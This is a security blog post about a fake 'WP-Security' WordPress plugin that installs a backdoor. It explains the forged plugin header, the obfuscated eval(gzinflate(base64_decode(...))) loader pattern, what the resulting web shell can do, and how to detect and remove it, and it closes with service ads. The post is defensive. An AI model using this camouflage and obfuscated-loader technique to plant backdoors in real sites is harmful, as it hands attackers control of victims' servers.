The “WP-Security” Phishing Plugin – Analyzing the Fake WordPress Security Team Malware

Published on 12/25/2025
MD Pabel
Read with ChatGPT

Introduction: The “Wolf in Sheep’s Clothing”

If you are reading this, you likely found a suspicious folder in your file manager located at wp-content/plugins/WP-Security, or your security scanner flagged a file containing a long string of random characters wrapped in eval(gzinflate(base64_decode.

Here is the hard truth: “WP-Security” is not a legitimate plugin.

Despite claiming to be authored by the “WordPress Security Team,” this is a sophisticated piece of malware known as a Trojan or Backdoor. It relies on social engineering—mimicking the look of a real security tool—to trick site administrators into leaving it installed.

What exactly is the WP-Security Malware?

Hackers know that if they name a malicious file hack-script.php, you will delete it immediately. Instead, they use Camouflage.

This malware creates a directory that looks legitimate alongside your other plugins (like WooCommerce or WP Mail SMTP). It includes a standard plugin header (the text at the top of the file) that claims:

  • Plugin Name: WordPress Security
  • Author: WordPress Security Team (Note: This is a fake author; no such official team publishes a plugin under this name)
  • Description: “Enhance the security of your WordPress site…”

This text is purely for show. The legitimate WordPress security team does not release a plugin with this generic name or structure.

How It Works: The eval Obfuscation

The core of this malware lies in the code immediately following the fake description. You will see a line that looks like this:

eval(gzinflate(base64_decode('DZVFrsUIggSP01X...')));

The 3-Step Attack Process:

  1. base64_decode: The long string of random letters and numbers is data encoded in Base64. This allows the hacker to hide the actual PHP code so it isn’t readable by humans.
  2. gzinflate: The hacker compressed the malicious code to make the string shorter and harder for basic antivirus scanners to read. This function unzips it.
  3. eval: This is the most dangerous command. It takes the now-decoded hidden code and executes it as if it were part of your website.

What does the hidden code do?

Once decoded, this script usually functions as a Web Shell. It gives the attacker full control over your website, allowing them to:

  • Create, delete, or modify files on your server.
  • Create fake admin accounts to regain access later.
  • Inject spam links (SEO Spam) into your posts to boost illegal websites.
  • Redirect your legitimate visitors to scam sites.

Why did I get infected?

Finding this plugin is usually a symptom of a previous breach. It was likely placed there by an automated bot that exploited a vulnerability in:

  1. Another outdated plugin: (e.g., an old version of Elementor, WooCommerce, or a slider plugin).
  2. Compromised Credentials: An admin password that was reused or stolen.
  3. Nulled Themes: If you downloaded a “premium” theme for free from a pirate site, this backdoor often comes pre-installed.

Identification Guide: Do I have it?

Search your server (via FTP or File Manager) for the following indicators:

  • File Path: /wp-content/plugins/WP-Security/
  • File Content: Look for the specific string eval(gzinflate(base64_decode near the top of the file.
  • Author URL: The code often links to https://wordpress.org generally, but the specific plugin slug wp-security does not exist in the official repository in this context.

How to Remove the WP-Security Malware

Step 1: Backup Your Site
Before deleting anything, take a full backup of your database and files.

Step 2: Delete the Folder
Navigate to wp-content/plugins/ and delete the entire WP-Security folder. Do not just deactivate it; delete the files from the server.

Step 3: Check index.php and wp-config.php
This malware is rarely alone. Check your root index.php and wp-config.php files. If you see the same eval(gzinflate... code at the top of those files, carefully remove only that line of code.

Step 4: Audit User Accounts
Go to your WordPress Dashboard > Users. Look for any Administrator accounts you do not recognize (often named wp-support, sys-admin, or random letters). Delete them immediately.

Step 5: Install a Real Security Scanner
Install a reputable security plugin (like Wordfence or Sucuri) and run a “High Sensitivity” scan to find any other hidden backdoors.

Conclusion

The “WP-Security” plugin is a classic example of hackers hiding in plain sight. By using a trustworthy-sounding name, they hope you will hesitate to delete it.

The Rule of Thumb: If you didn’t install it, and you can’t find it on the official WordPress.org plugin repository, it doesn’t belong on your site.

Need help cleaning this up? Contact Us for Professional Malware Removal

Explore Our Security Services

WordPress Malware Removal

Professional WordPress malware removal to clean, secure & restore your hacked site fast — trusted by 2300+ clients.

Custom Website Development

Build a custom, responsive & SEO-optimized website or web app with modern tech — tailored to your business goals.

Fix WordPress Errors

Diagnose and fix WordPress site issues — fatal errors, performance problems, broken layouts, plugin conflicts and more.

About the Author

MD Pabel

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With over 7+ Years years of experience, he has completed more than3200+ projects, served over 2300+ clients, and resolved4500+ cases of malware and hacked websites.

3Zero DigitalLinkedInGitHubLeetCodeHackerRankMediumDev.toX (Twitter)